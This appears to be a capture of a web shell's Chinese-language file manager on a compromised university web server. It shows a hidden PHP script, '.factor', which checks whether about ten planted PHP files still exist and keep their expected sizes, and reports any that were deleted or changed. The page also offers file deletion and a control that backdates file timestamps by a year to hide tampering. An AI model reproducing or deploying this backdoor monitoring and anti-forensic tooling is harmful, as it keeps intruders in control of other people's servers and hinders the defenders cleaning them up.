文件操作 - .factor
返回文件管理
返回主菜单
删除本文件
文件: /var/www/demoestudiantes.uaysen.cl/html/.factor
编辑文件内容
<?php $r = '/var/www/demoestudiantes.uaysen.cl/html'; $x = ["/commons.php"=>"bd@@1345344@@937", "/CYEC06.php"=>"bd@@1276543@@900", "/class.scm.php"=>"bd@@1281826@@914", "/Mail.php"=>"bd@@1345331@@93", "/articles.php"=>"bd@@1345300@@18", "/class.php"=>"bd@@1345312@@80", "/aboutme.php"=>"bd@@1344667@@907", "/articles.php"=>"bd@@1280788@@868", "/aboutme.php"=>"bd@@1345322@@3", "/class.php"=>"bd@@1282894@@854"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');
修改文件时间
将文件时间修改为当前时间的前一年
删除文件